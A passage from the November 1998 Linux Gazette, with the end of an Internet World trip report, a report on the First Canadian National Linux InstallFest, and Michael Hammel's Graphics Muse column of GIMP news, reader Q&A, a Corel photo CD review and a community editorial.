After being let down by the Netscape keynote, I rushed back up to the RedHat booth to see how the CD handout was going. It was going well. There was a line about 20 to 30 people long waiting to get a RedHat CD. I took the opportunity to take some pictures of the line of Linux users to be. With that, I wished the RedHat team good luck in their endeavors and took off to my last session, "Migrating to IP version 6." This session was given by two IBM consultants out of North Carolina. My first tag team seminar with that same tele-evangelist delivery. IPv6, Amen!
 



 


I was expecting the session to go until 5:30, but it ended an hour earlier. I had planned to then roam around the show floor a bit more, looking to see if there were any after-hours networking parties to go to. But somehow, after getting to the main entrance plaza of Javits, with the rain coming down, and not having much of a stomach for more Internet World show biz, I canned my plans and made a beeline to Penn Station to catch the 5:22 train back to Long Island. Once on the train, I had an hour and a half to ponder my last 4 days. I've only been to scientific conferences. The last one, Computing in High Energy Physics, I found to be rather tedious and left after two days. (I had a good excuse: the DAQ system for the experiment I'm on was acting up and they needed their expert back in house. Although I could have, and did, solve all their problems by walking the clueless, over the phone, through the various button clicks to get back into full data taking mode.) After I put Linux on my first home grown PC, 3 months after getting my Ph.D., my life has been so tied up with this OS that I've often pondered why I continue working at a High Energy Physics lab. I've done my best to help Linux gain inroads into the high energy and nuclear physics community by porting a lot of Fortran code to Linux. I've also leveraged my position at the lab to put together the first official group of Intel PC's running Linux for the scientists to analyze their data. Being in the DAQ subfield of physics gives you a high vantage point from which to watch the technology used to bring the Internet to life evolve through time. My work has been all Internet: Unix workstations, data over IP (gigabytes of data and now going on to terabytes), routers, switches, e-mail, HTML, Java, X11 and on and on, since I first learned how to program a computer back in my first physics lab when I was 18. Walking around the show floor and going to the sessions brought my whole world around. Internet World is really my world. I knew, in depth or otherwise, every aspect of what was being presented at that show. And with the Linux people there, this added gravy to the show. It was some 4 days. Friday I'll be back to helping BNL users find their way through the Unix/Internet maze of the lab. Monday I'll be back worrying about why I can't sustain 20 Mbytes/sec data throughput in our DAQ, or rather why the clueless users seem to stumble all over my DAQ system. But for now, on my ride home, I just let all those memories of Internet World swirl around my head, as I looked out of the LIRR train watching Long Island sweep by.
 


Copyright © 1998, Stephen Adler
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


First Canadian National Linux InstallFest

By Dean Staff


Photo Album


Saturday, September 26, 1998 was a big day for the Linux community in Canada--that day the First Canadian National Linux InstallFest was held.

The InstallFest was organized on a national level by CLUE (Canadian Linux Users' Exchange) to provide interested people with experienced help installing Linux on their computers. CLUE is an organization that supports the development of local Linux Users Groups, and co-ordinates events, corporate sponsorships and publicity at a national level. CLUE hopes that by enhancing association and communication amongst its developers, users, suppliers and the general public, it can increase the use and appreciation of Linux within Canada.

Highlights

A dozen different events, organized by local Linux User Groups, were held across Canada from Halifax to Victoria, all taking place on the same day.

The Montreal event, at its peak, had as many as 100 people in the room at once and, by all accounts, had 200 to 250 people stop by. They did 40 installs, only 20 of which were from preregistrations. They even had the crew of the local TV show Branché stop by for an interview, due to air in November. Also worth mentioning: they had guru Jacques Gelinas, the author of the LinuxConf software, answering questions.

Two InstallFests were held in the Toronto area: one at Seneca College and the other at the University of Toronto Bookstore. The Seneca College event had a late start due to a power outage, but more than made up for it, as the unofficial count of installs was about 100. They even rolled out their Beowulf-class Linux cluster for the masses to look at and see how a few ``small'' Linux boxes can be turned into a supercomputer.

The Manitoba UNIX Users Group (MUUG) held their InstallFest at the University of Manitoba as a two-day event beginning on Friday. As this was their first InstallFest, they deliberately kept it small and aimed mostly at the faculty and students of the U of M. About 140 people attended, more than half of whom purchased a Linux CD, and there were 19 successful installs. Attendance was greater than expected, probably due to the national news coverage the event received. At least one person came in who said he had discovered the InstallFest by seeing a segment about it on CTV News-1, a national news network.

The MUUG web site made mention of one more interesting story from the event. One attendee brought in a system which became known as ``Franken-puter''! It was apparently two separate cases tossed together with all sorts of spare parts the owner was able to scrounge up, and connected with a piece of coax Ethernet cable. He spent as much time swapping parts and reconfiguring on the fly as he did installing Linux. He apparently showed up at the start of the event on Friday and didn't finish until mid-afternoon on Saturday. Even after all that, he still hung around afterwards to help others with their installs.

The Ottawa InstallFest was hosted by the Ottawa Carleton Linux Users Group (OCLUG). While almost all the other events were held in the more academic setting of local colleges and universities, OCLUG had their event sponsored by NovoClub, a local retail store. NovoClub is located in a shopping mall and managed to get an empty store front for OCLUG to use. They also arranged for display kiosks to be set up in the mall by several companies. There were training companies, a local ISP and, most notably, Corel Computer displaying their NetWinder, and of course, NovoClub was offering specials on their very large selection of Linux products. The whole event was more like a mini trade show than a typical InstallFest.

The unofficial count at the installation store front was that 250 people came through the door. This count included those who came to have Linux installed on their machines, members of the press, and ``just curious'' folk who stopped to ask questions while wandering around the mall.

OCLUG chose not to have people preregister; they decided to just let people come and register the day of the event. It was supposed to start at 10 AM and go to 5 PM. However, people were lined up at 9 AM when the mall opened, and they soon ended up with a backlog of machines waiting for Linux installation. By 3 PM they were two hours behind and had to start turning people away. By the time it was over, they had installed Linux on 50 to 60 machines and still had 10 they could not finish.

Not all events were as big as the ones listed above. The New Brunswick Linux Users Group had only ten people attend, with four successful installs. They were a bit upset at the low turnout. However, it was also Homecoming week at Mount Allison University in town, and a football game was in full swing at the same time as the InstallFest. They are in the process of designing a tutorial for their new users and anyone else who is interested. The Fredericton InstallFest was a little larger, with thirty attendees and ten installations.

Overview

The general consensus is that as a public relations event, the InstallFest was an overwhelming success. It got a lot of people asking questions about Linux, some of whom took the plunge and installed Linux for the first time. However, it was not completely successful as a technical event. By no means is this a reflection on either those who organized the individual events or the volunteers who helped with the installations--they all did a stellar job--just no one was prepared for the magnitude of the response.

Most LUGs asked people to register prior to the event. This allowed them to line up as many volunteers as they thought they would need. Some groups, like the Vancouver Linux Users Group, were swamped with preregistrations and had to halt registration prior to the event because they could not accommodate everyone. Even with preregistration, the day of the event was hectic. The report from Seneca College in Toronto was that their event lasted until 9 PM, and they were still unable to complete all the installs. Other events had similar reports; despite the best laid plans, the response overwhelmed the number of installers.

Some installs were unsuccessful, either due to time constraints or hardware compatibility issues that were not easily overcome. That said, the ratio of unsuccessful to successful installs was minimal. In most cases, it was one or two to fifty. I've seen more failures on MS Windows installations than that.

Where Do We Go From Here?

One of the interesting side-effects of the OCLUG InstallFest was that preliminary discussions were started between Zenith Learning Technologies and Corel Computer to set up a corporate Linux training program. Also, Oliver Bendzsa of Corel Computer reportedly said that he was as busy at the InstallFest as he was at Canada Comdex, a 3-day trade show that drew some 50,000 people in Toronto.

Dave Neill, a founding member of OCLUG, said that while grassroots events like the InstallFest are a great way to promote Linux, it is now time to start approaching local computer resellers and showing them there is a demand for systems with Linux pre-installed. I work for Inly Systems, the largest independent computer reseller in the Ottawa area, and while we are now expanding the variety of Linux products we carry, we still do not offer Linux pre-installed on our machines. With at least three technicians who have experience with Linux and/or UNIX installations, we could do this if people began asking for it. However, we are an exception; most resellers don't have technicians with Linux experience.

One of the issues that must be answered is how and where companies can have their technicians trained. This is where training companies like Zenith Learning Technologies come in. The fact that Zenith was at the OCLUG InstallFest shows that they realize the potential for Linux training. With such companies as Corel, Oracle, Intel and Netscape investing time and money in Linux, it won't be long before other training companies jump on the bandwagon.

Today Canada, Tomorrow the World!

Plans are already in the works for a Global Linux InstallFest next year. If you would like to know more or would like to get your LUG involved, please check out the CLUE web site at http://www.linux.ca/ and contact Matthew Rice. An event of this magnitude will need lots of help organizing, so don't be shy--watch out Bill, the Penguin is on the move!

For more information on the individual InstallFest events, please visit the CLUE web site for a list of links to all the participating user groups.


Copyright © 1998, Dean Staff
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"



muse:
  1. v; to become absorbed in thought 
  2. n; [ fr. Any of the nine sister goddesses of learning and the arts in Greek Mythology ]: a source of inspiration
© 1998 by Michael J. Hammel

Welcome to the Graphics Muse! Why a "muse"? Well, except for the sisters aspect, the above definitions are pretty much the way I'd describe my own interest in computer graphics: it keeps me deep in thought and it is a daily source of inspiration. 

[Graphics Mews][WebWonderings][Musings][Resources]

This column is dedicated to the use, creation, distribution, and discussion of computer graphics tools for Linux systems.

This month marks the second anniversary of the Graphics Muse column.  It's hard for me to believe I've been doing this for that long.  My general span of attention is about a year, but I've managed not only to hold onto an interest in this column, I've managed to grow it into several articles and covers for the Linux Journal, a book, and a web site devoted to computer graphics and based on this column.  I guess when you get on a roll, stick with it.

The more observant readers will also notice a little change in format for this column.  I finally did a little color matching for the various images I use and, at the behest of more than just a few readers, got rid of the multicolumn articles.  Most of the announcements are on a page of their own now, although I will be keeping a few on the first page.  Overall, I much prefer this new format.  It just looks cleaner.  I hope you like the changes.

In this month's column I've taken a chance and offered a little editorial on the way things are as I see them.  Much of what I've seen in the past few months revolving around Linux has been positive news - announced support from all 5 major database vendors (Oracle, IBM, CA, Sybase, and Informix), Intel and Netscape announcing investment in Red Hat, and lots of generally good press.  But along with this I've seen a fair amount of disunity among the community.  There are camps forming between followers of various leaders.  I find this sad.  Hard lines drawn by groups with disparate interests and ideas tend to drain the energies of both sides of the argument, and I'd really hate to see that happen with Linux.  The worst aspect of these arguments is the distraction that's created from the real focus - proving that Open Source/free software can really be a viable solution for end users, not just developers.  That's key to making Linux a world player in corporations, education, government and on the desktop.

In this month's column you'll find:



Other Announcements:
Blender Manual
Moxy 0.1.2
Quick Image Viewer 0.9.1
GQview 0.4.3
FLTK 19981006
XawTV 2.28
jmk-x11-fonts 1.2
KIllustrator
MathMap
Metro-X 4.3
GNU PlotUtils 2.1.6
Simple DirectMedia Layer Version 0.8
tkscanfax
MAM/VRS
Xi Graphics Announcements
< More Mews >
Disclaimer: Before I get too far into this I should note that any of the news items I post in this section are just that - news. Either I happened to run across them via some mailing list I was on, via some Usenet newsgroup, or via email from someone. I'm not necessarily endorsing these products (some of which may be commercial), I'm just letting you know I'd heard about them in the past month.

S.u.S.E announces support for Matrox Cards
Dirk Hohndel has put a new version of XFCom_Matrox on the ftp site and updated the web site at http://www.suse.de/XSuSE/XSuSE_E.html.
The new server should work on all current Matrox boards, including the
  • Matrox Millennium G200 (SGRAM and SDRAM)
  • Matrox Mystique G200
  • Matrox Productiva G100
The server is well accelerated and supports 8/16/24/32bpp on all of these cards.
Please report any problems with these servers to


Meteor 1.5.2 - Matrox Meteor video capture board driver/utilities
is pleased to announce the release of "meteor-1.5.2", a driver and collection of applications for the Matrox Meteor frame grabber.  This driver runs on the Linux 2.0.xx series of kernels. Its earlier counterpart, version 1.5.1, has been reported to work on many 2.1.xx releases and later 1.3.xx kernels.  This version should work on those kernels also.

The Matrox Meteor is a high-end, professional quality video capture board commonly used in demanding video capture applications such as laboratory research, robotics, and industrial inspection.  Its video quality and the clarity of its captures are generally notably superior to garden-variety consumer-grade image capture devices, and its price reflects this.

This driver is bundled with single frame capture software, software for displaying real time video in a window, patches to make the meteor work with "vic", a Linux video conferencing package, and other goodies.  The "official page" for this package is found at http://www.rwii.com/linux/.  Other information about this driver can be found at http://www.cs.virginia.edu/~bah6f/matrox/.

Like the numbering scheme for the Linux kernel itself, the odd middle numeral in the version number ("5") indicates that this is a "development" release.  It nevertheless contains numerous enhancements over the last "stable" release, not the least of which are the ability to compile without hacking on the latest development and stable Linux kernel versions, as well as the ability to compile and run properly on libc6-based distributions.  In actuality, this "development" version should prove to be pretty much as stable as the last "stable" release.



Crystal Space 3D engine Has Moved
would like to announce a new homepage for the Crystal Space 3D engine. He develops Crystal Space mainly on Linux, but it has also been ported to other platforms (like Windows, DOS, Macintosh, OS/2, Amiga, ...)

The URL is http://crystal.linuxgames.com

Crystal Space is a free (LGPL) 3D engine written in C++. It supports colored lights, mipmapping, mirrors, reflecting surfaces, 3D models/sprites, scripting, and other features.  The purpose is to make a free and flexible 3D/game engine.  Crystal Space is also a rather large open source project. There are currently about 182 people subscribed to the developers mailing list. You can join too!



Casio QV-10 digital camera HOWTO
Bob Hepple has re-posted the HOWTO for using the Casio QV-10 digital camera with Linux (published in Linux Gazette) at:
http://www.bit.net.au/~bhepple/qvplay/qvplay.html

Bob Hepple
mailto:
http://www.finder.com.au



Casio QV digital camera support for the GIMP
is pleased to announce a new plug-in for the GIMP. It is called 'cam' and allows the GIMP to read CAM files directly. Those files are the ones stored in Casio QV-* digital cameras, and you can dump them using, for instance, QVplay.
URL: http://www.mygale.org/~jbn/qv.html


DC20Pack - software for Kodak DC20/25 cameras

DC20Pack is a software package for Kodak DC20 and DC25 digital cameras which contains two programs: dc20term and dc2totga.  dc20term transfers the pictures out of the camera and stores them as raw data files.  dc2totga converts those raw data files to standard image files using the popular TGA image file format.
URLs:
ftp://sunsite.unc.edu/pub/Linux/apps/graphics/capture/dc20pack-1.0.tgz
http://home.t-online.de/home/Oliver.Hartmann



GIMP wins Productivity Software award from APC Magazine

The following note was posted to the GIMP Developers mailing list on October 19th, 1998:

I'm writing from Australian Personal Computer magazine and would like to congratulate your having won an Award at our annual IT Awards evening last Thursday.

We have a beautiful crystal trophy we would like to send you having won in the Productivity Software of 1998 category.  Please can you forward me your street address and phone number as I would like to send this by courier to you.

Regards
Helen Duncan
New Media Projects Manager
Australian Personal Computer

The official award announcement can be found at http://newswire.com.au/9810/award.htm.

The award is being shipped to Peter Mattis who will be placing the trophy in the lobby of the XCF (Experimental Computing Facility) at Berkeley, which is where the GIMP has its origins.  Congratulations to all those involved in the evolution of the GIMP!


Did You Know?

...For those of you who don't read GIMP News, a couple of new tutorials have been added to http://www.xach.com/gimp/tutorials/.

...at a refresh rate of 60Hz or lower, you'll often detect an eyestrain-causing flicker on your screen. Flicker generally disappears at 72Hz; the Video Electronics Standards Association's (VESA's) recommended minimum for comfortable viewing is 75Hz. Whichever card you buy, in any price range, be sure that it and your monitor can synchronize to provide at least a 75Hz refresh rate at your highest preferred resolution and color depth.

From ComputerShopper.com's article "Performance on Display"
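
The 75Hz advice above is easy to sanity-check against an XFree86 modeline, since the vertical refresh rate is just the dot clock divided by the product of the total horizontal and vertical counts (visible area plus blanking).  A minimal sketch in Python, using the standard VESA 1024x768@75Hz timings as illustrative numbers; substitute the figures from your own modeline:

    # Vertical refresh (Hz) = dot clock / (horizontal total * vertical total).
    def refresh_hz(dot_clock_mhz, h_total, v_total):
        """Return the vertical refresh rate in Hz for a video mode."""
        return dot_clock_mhz * 1e6 / (h_total * v_total)

    # Modeline "1024x768" 78.75  1024 1040 1136 1312  768 769 772 800
    # The last number of each group (1312, 800) is the total count.
    print(round(refresh_hz(78.75, 1312, 800), 1))   # -> 75.0
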
...a poll is being run by lumis.com asking which platform you'd like to see Alias/Wavefront's Maya 3D product ported to.  Go there and tell the world - we want graphics tools ported to Linux!  Slashdot had reported this link and noted that MacOS was way out in front, but the Slashdot effect(tm) had already taken hold by the time I got there, and Linux was in front once again.

...you can find collections of free fonts all over the Internet.  Take a look at the following sites:

http://www.fountain.nu/fonts/free.html - TrueType only (PC-format downloads are in small type)
http://www.signalgrau.com/eyesaw/html/main.htm - TrueType and Postscript Type 1 fonts (pfb)
http://www.rotodesign.com/fonts/fonts.html - Type 1, but sans most punctuation and some numbers
More sites can be found from Yahoo's listings:  http://dir.yahoo.com/Arts/Design_Arts/Graphic_Design/Typography/Typefaces/
...another 3D modeller is under development, this one written in C and Tcl/Tk.  It is called The Mops and has support for NURBS curves and RIB export files.  Take a look at The Mops Home Page.

...there are a couple of newsgroups being run off the POV-Ray web site for the discussion of POV-Ray, the 3D raytracing tool and the display of images.  Take a look at news://news.povray.org/povray.binaries.images and news://news.povray.org/povray.general.

...a very good explanation of using matrix transformations with POV-Ray can be found at http://www.erols.com/vansickl/matrix.htm.  Additionally, you can find some useful POV-Ray macros at http://www.erols.com/vansickl/macs.htm.

Q and A

Q:  What does one use [in the Gimp] in place of Photoshop's smudgy finger?  I've tried using the "fill with color or gradient" to no avail.  I just want to smudge.  Ideas?

A:  There is no smudge tool. It has been oft requested, but no one has written one.  Some not-quite-the-same alternatives: the blur tool, IWarp, or selecting a region and applying a Gaussian blur.  Not the same, but alas...

Adrian Likins
Q:   I want to place a block of text with evenly single-spaced lines using some arbitrary font onto my Gimp image.  Rather than doing it line by line with the Text Tool, is there an easier way?

A:  While Ascii2Image is probably the nicest solution, there is another somewhat more obscure method.  Use cut and paste into the Text Tool entry; the text tool has no problems with newline characters - you can make multiple text lines directly from the text tool this way.

Seth Burgess
Q:  Is there any way to get gimp to use virtual memory instead of its swap file? I was working on some images where the gimp swap file was about 30mb. Just about any operation I do causes lots of disk activity. The machine I'm running this on has more than enough physical memory, but it is not being used.

A: Change the value for the Gimp tile cache in the Preferences dialog.  I'd say with 160MB of RAM, set it to at least 80MB or so.

Adrian Likins
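
Adrian's advice amounts to a simple rule of thumb - give the Gimp's tile cache about half of physical RAM so that large images are juggled in memory rather than in the Gimp's own swap file.  A trivial sketch of the arithmetic (the 160MB figure is just the example from the question above):

    def suggested_tile_cache_mb(physical_ram_mb):
        """Rule of thumb from the answer above: roughly half of RAM."""
        return physical_ram_mb // 2

    print(suggested_tile_cache_mb(160))   # -> 80, matching the advice above
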
Q:  Ok, now I'm new to Linux and the Gimp - my friends got me into Linux in the last couple of months.  How can I, in the Gimp, save a file without having to merge the layers and still have the graphic look the way it's supposed to?  Am I just really missing something here?

A:  If you just want to save an "in-progress" version of your image that preserves layers, guides, channels, selections, etc., then you should be saving as .xcf. That's the Gimp's native format.

If you want to "export" an image to a single layer format but not have to merge the layers, you should have a look at Simon Budig's export scripts that automate this task. These scripts can be found at:

http://www.home.unix-ag.org/simon/gimp/export-file.html
Adrian Likins
'Muse Note:  as you can see, Adrian and Seth offer some pretty good advice on the Gimp User's Mailing list!

Reader Mail

wrote:
Hi Mr Hammel,
Looking at the April 98 issue...
Reader Mail
Nick Cali ([email protected]) wrote:
      Just want to drop a line thanking you for your effort at the Gazette and with Linux.  Really, thanks a lot.

Muse:  You're quite welcome.  I had gotten some rather harsh email from someone recently that had me considering dropping out of the Linux world altogether.  Getting little notes like this, however, helps keep me going.  Thanks!

Love the column,
Please stay,
'nuff said.

:-)
[email protected]

'Muse:  Woohoo!  My favorite kind of reader mail.  Ok.  I'll stick around for a while longer.

In a previous message, Rolf Magnus Nilsen says:

I'm really sorry for bothering you with this problem, but as an avid reader of the Linux Gazette and the Linux Journal I have read most of your writings there. And hope you can take the time to answer some questions.


'Muse:  No problem.  I try to answer all the questions that come my way, if I can.

Now, we are going to do a small project in VHS video, and we need some tools for video editing. The problem is, we can't find any tools besides the simplest command line tools.
'Muse:  That's because there aren't any "canned" tools yet.  See below.
So our current plan is to run a framegrabber, grab about 25 pictures a second, organise them, put in effects/text and use mpegencode to make a movie which we play back to our VCR.  But this is quite a task, when you consider a movie of about 45 - 50 minutes.

I have been searching around quite a bit, but have not found anything better than the tools I mentioned.

Do you know of any resources or products I should have a look at? Buying a commercial product is OK if it runs under Linux.

'Muse:  Unfortunately this area of graphics tools on Linux is pretty sparse.  Like you said, there are a number of command line tools for doing very specific tasks (like frame grabbers or creating MPEG video animations), but there aren't any user-friendly, GUI-based tools like, for example, Adobe Premiere.

That said, there is one project you might want to look into.  The project is called Moxy (http://millennium.diads.com/moxy/).  Not much information there yet, but its aim is to be a Premiere-style application.  It's in *very* early development.

You might also drop a line to the Gimp-Developer mailing list.  A number of people had been discussing creating an application like this on that mailing list.  I haven't heard what's become of this, however.  Adding a plug-in to the Gimp wouldn't be the best way to handle video editing - the Gimp isn't designed for that type of work.  But eventually interfaces should be (re: ought to be) developed that allow easy transfer between the Gimp and video editing tools.

No commercial packages that I know of are being ported yet.  Desktop publishing on Linux is still somewhat limited to word processors and the Gimp, which lacks color management facilities that are quite important to most desktop publishing and video editing environments.

I'll post your message (actually this reply) to the next Graphics Muse column and perhaps someone with more information than I have will contact you.  If you hear of any commercial packages being ported let me know.  I'd love to start hearing of such ports!

BTW: I'm really looking forward to "The Artists' Guide to the GIMP", it is ordered already :-)
'Muse:  Hey!  A sale!  The first official one that I know of.  I hope you find it useful!
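
Incidentally, it's easy to put numbers on why the frame-by-frame plan above is "quite a task".  A back-of-the-envelope sketch, assuming full-frame PAL-ish grabs (768x576, 24-bit) stored as uncompressed PPM; smaller frames shrink the total proportionally, but the scale of the problem is clear:

    def raw_footage(minutes, fps=25, width=768, height=576, bytes_per_pixel=3):
        """Frame count and raw size (in GB) for an uncompressed capture."""
        frames = minutes * 60 * fps
        gigabytes = frames * width * height * bytes_per_pixel / 2**30
        return frames, gigabytes

    frames, gb = raw_footage(45)
    print(frames, round(gb))   # -> 67500 frames, roughly 83 GB before encoding

That's far beyond what a typical 1998 disk can hold, which is why the reader's grab-then-encode plan is such an undertaking without dedicated tools.
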

In a previous message, Dylan The Hippy Wabbit says:

I have a particular interest in stereoscopic vision, and so I would like to have an X server that supports shutter glasses.
'Muse:  (Note - doesn't anyone go by their real names anymore?)  Ouch.  My eyes are hurting already just thinking about these.  People (like me) who have one eye "stronger" than the other can't see these images, at least not very well.  They give me a headache (so do 3D glasses).
In case you haven't heard of these, they use liquid crystals to alternately cover each eye.  The display then alternates in phase so that each eye sees only one view.  Apart from its use in photography or molecular modelling, it makes one hell of an extension to Quake!

Some, although only a few, 3D accelerators support them and there is an extensive web site including homebrewed controllers at:-

http://www.stereo3d.com/3dhome.htm

However, I can't find any mention of it in the XFree86 docs.  The AcceleratedX web site mentions support for "3D PEX" which I assume is a typo, although it could be something genuine I've never heard of.  I've searched the LG archive to find only your mention of a POVRAY "beamsplitter" in issue 27.

Do you know of anything?  After all, we can't let DOS/Windows users have anything we can't get can we?  ;-)

'Muse:  No such beast is yet available.  It's just not in high demand, so you probably won't see it from the commercial vendors unless a paying business customer requests it (with some serious dollars behind the request).  XFree86 will support it as soon as someone decides they want/need it and has the time/expertise to write the code for it.  If the video cards handle it already, then it's just a matter of adding that support to an existing video card driver (assuming a standard, well known video chipset on the card).  The problem is usually finding someone who knows how to do that.  A post to comp.os.linux.x or maybe a letter to the Linux Gazette editor will put you in contact with someone.  The LG editor will simply post your request in the next issue of the Gazette and, with luck, someone will contact you about their current work in this area.  You might also try sending a letter to the XFree86 support address (it's listed on their web site, www.xfree86.org).

I'll post your message in the November Muse column.  Maybe one of my readers will contact you about this.  Keep your fingers crossed!

BTW, 3D PEX is not a typo.  PEX is the PHIGS Extension, a formal X Extension that supports PHIGS, the Programmer's Hierarchical Interactive Graphics System.  That's a sort of OpenGL from the earlier days of computer graphics, although it's still in use today in a few places.



Review:  Corel Super 10 Packs CD collections

I haven't been doing much with my Web site this past month.  Once I got the new format running I didn't have much need to mess with it, although I do have to remove the Apache logs fairly often (12MB of logs in less than 5 days causes me to keep running over my disk quota).  So I was a little unsure of what to write about for this month's Web Wonderings.  That is, until I wandered through a local computer retail outlet.  There on the shelves I found a number of Corel's Super Ten Pack CD image collections.

Normally I wouldn't consider using stock photos from Web-style CD collections because the quality of the photos generally isn't much better than what I can take myself.  Additionally, most of those "25,000 (or more) Image" collections you find on the shelves come with images suitable only for the Web - generally no more than about 1024x768 resolution.  These usually are far too small for any other media.

But an article in the September 1998 issue of Digital Video magazine covering stock image collections mentioned the Corel image collections, including their Super Ten Packs, as a source of quality stock images.  Since I trust this magazine more than my own common sense (which is still rather new to the graphic arts world) and due to Corel's fairly full-blown support for Linux, I decided to check out one or two of these collections.

What is a Corel Super Ten Pack?

The Super Ten Packs are collections of 10 CD's, each with 100 PhotoCD images on them.  The current collections are classified into a number of different categories:
 

Aircraft; Animals; Architecture; Art, Sculpture, & Design; Business & Industry; Canada; Cars; England; Fashion; Food; Gardens; Great Works of Art; Landmarks; Museums & Artifacts; Nature; People; People II; People III; Seasons; Sports & Leisure; Textures; Textures II; Textures & Patterns; Textures & Patterns II; Transportation; Travel; Underwater

There is also a Sampler Ten Pack.  The sampler set has CD's titled, among others, "War", "Alien Landscapes" and "Success".  Unfortunately the limited documentation doesn't say from which other Ten Packs these samples are taken.  I expect that Corel will expand this list further as well, since they tend to produce a large number of stock photography CDs in general.

The images are royalty free but there are some restrictions to their use.  First, you must display the following text somewhere in your publication:

This product/publication includes images from [insert full name of Corel product] which are protected by the copyright laws of the U.S., Canada and elsewhere. Used under license.
Since I'm reviewing the CDs in general, I hope the above counts towards meeting this requirement.  They also limit online display of the images to 512 x 768, but that may only be if you display the image unmodified.  It's not clear whether such restrictions exist for derivative works that use the images.

How do you get them?

The Super Ten Packs are available at computer retail outlets or online.  I purchased my two sets from MicroCenter here in Dallas.  Corel's online site contains thumbnails of all the images from their huge collection of images so that you can preview them before purchase.  All of the online versions have watermarks so don't get any ideas about trying to swipe them from their site (unless you like watermarked images).

Online ordering can be done at http://www.corel.com/products/clipartandphotos/photos/superten.htm.  You can also search for individual images and order those online at http://corel.digitalriver.com/.  I didn't check to see if you could actually order the photos individually or just in the sets that contain them, but a reliable source who has used the service in the past suggested you could purchase them individually.

When you go to http://corel.digitalriver.com/  just click on the Photo CD package image to get a list of titles.  From there you can click on the individual CDs to preview all of the images on each CD.  Each CD runs about $35-$45US.

What do you actually get?

I purchased two different sets, the Sampler Ten Pack and the Textures II Ten Pack.  Both run a little higher at the retail outlet, as expected, and came in boxed sets.  Inside the box I found the 10 CD's shrink wrapped along with a small pamphlet.  The pamphlet had the obligatory licensing information along with full-color thumbnail images of all the images on each CD, one page per CD.  This is quite useful and something I hadn't quite expected for some reason.

The images on the CD come in PhotoCD format.  This format specifies 5 different image sizes:

128x192
256x384
512x768
1024x1536
2048x3072
To read this format you have a couple of options.  First, the Gimp has a PhotoCD file plug-in.  You can tell if you have this plug-in installed if you try to open an existing file and the Open Options menu includes an entry for PCD.  If you try to open a file from the CD by double clicking on the filename in the Load Image dialog, then the plug-in is started and you get the dialog shown at left.  You'll notice that this plug-in offers the additional resolution of 4096x6144.  I'm not certain if this is a valid PhotoCD resolution or not, but it didn't seem to matter.  Unfortunately, I was unable to read any of the images from the CD in resolutions higher than 512x768 using this plug-in.

I had to switch to an alternative option, the hpcdtoppm tool from the NetPBM package.  With this program I could read the higher resolutions - up to 2048x3072 - into a PPM formatted file which I could then load into the Gimp.  I didn't have time to determine if the problem was with the Gimp plug-in or the CDs, but I suspect the plug-in is at fault, since I could read the higher resolutions with hpcdtoppm.  Note that the plug-in works fine for resolutions up to 512x768.
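
For the curious, here is roughly what that hpcdtoppm fallback looks like in practice, sketched as a small Python wrapper around the command.  The "-4" resolution flag (which should select the 2048x3072 16Base image) and the sample disc path are assumptions on my part - check hpcdtoppm's usage message on your system before relying on them:

    import subprocess

    def pcd_to_ppm(pcd_path, ppm_path, resolution_flag="-4"):
        """Shell out to hpcdtoppm (NetPBM) and capture its PPM output."""
        with open(ppm_path, "wb") as out:
            subprocess.run(["hpcdtoppm", resolution_flag, pcd_path],
                           stdout=out, check=True)

    # Hypothetical disc layout; PhotoCD images usually live under PHOTO_CD/IMAGES.
    pcd_to_ppm("/cdrom/photo_cd/images/img0001.pcd", "img0001.ppm")

The resulting PPM file then loads into the Gimp with no trouble.
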
 
 

[ More Web Wonderings ]


Off the shelf video cards: choosing the right solution the first time.
Metro Link X Input Support

State of the DisUnion

It's been two years since I started the Graphics Muse column in the Linux Gazette.  In that time I've watched Linux grow in ways many people felt possible but few could guarantee would actually happen.  I've also watched, with some dismay, the numerous battles being fought within our community and beyond.  So, I'd like to take this opportunity to place my opinion on the record on a few of the issues we've all faced these past two years.  If you are easily annoyed by other people's opinions, then just skip down to the bit on Where to go from here or jump over to the off-the-shelf video cards article.

RMS vs. Raymond vs Users

Both RMS (Richard M. Stallman) and Eric Raymond have done wonders for the community, and both should be applauded for their efforts and dedication.  However, their spirited enthusiasm, in the manner and form in which they display it in public, is not necessarily what we need now.  Linux and free software/Open Source software is a community, one that has grown beyond its bare communal spirit and now encompasses a metropolitan mix of individuals and groups.  And that mix includes a high number of end users - not developers, not hackers - users.  I wonder now whether either RMS or Raymond is truly interested in the end user, or whether their focus is solely on the developers' needs.  At this point, the community needs to focus on both.
Commercial vs. Free and World Domination
Unlike many Linux fans, I have no problem with commercial (re: proprietary) software.  There are people who both need and desire commercial software, regardless of what developers might consider the higher moral ground.  I personally will use the tools which best suit my needs.  I have always wanted a Unix desktop, ever since my days working on the Dell Unix products in the early 1990s, and Linux is it for me.  If commercial applications begin to show up that work well for me, I will use them.  I already use Applixware and commercial versions of the sound drivers and X server.  You don't have to encourage commercial development, but you shouldn't attack it either.  Having a different point of view does not make someone wrong or generally evil in all cases.  If you provide alternatives to commercial products, you'll find many people who will both use and support those alternatives.  But to dissuade others from using commercial products without first providing the alternative is tantamount to using the same tactics Microsoft uses with their vaporware announcements.  Convince by doing first.  It makes the counter-argument, the argument for commercial or proprietary software, more difficult to sustain.

On a related subject:  World Domination by Linux is not a goal I seek.  The first reason is obvious - if you displace Microsoft, you lose the strongest focal point that currently exists for the free software movement - the drive to displace Microsoft.  It is a bit of a catch-22 scenario, but I'd rather have Microsoft stay strong to keep developers on edge in the Linux community.  They seem to thrive on that.  Without real leadership in our community (and I'm not convinced we have that one strong individual or group that can claim the leadership role), it is imperative that the strong focal point be kept clear.  Focus is key in any project, be it writing software or climbing mountains or writing columns like this one.

The other reason I don't want world domination is that I really don't want to replace one egotistical maniac with several thousand (or million).  Great developers are egotistical - it's a form of self-confidence not unlike that displayed by great artists.  But I wouldn't want either in charge of my personal computing world.  They see the world from their perspective, and that perspective can be clouded by their own intellect.  It can be difficult to see the frustration of others when their problems seem trivial to you and easily solved.  Instead, I'd rather have the ability to control my own computing environment by having the opportunity to choose between multiple solutions to similar problems.  I'd love to see the Mac and BeOS expand their market share because, in the end, it only opens up my vistas of choice.  And that's what Linux is really about for end users.  Freedom of choice.

Vi vs. Emacs
Vi, of course.  Unless I have to write a book or article for non-Linux publishers.  Then ApplixWords.
Red Hat or Debian or S.u.S.E?
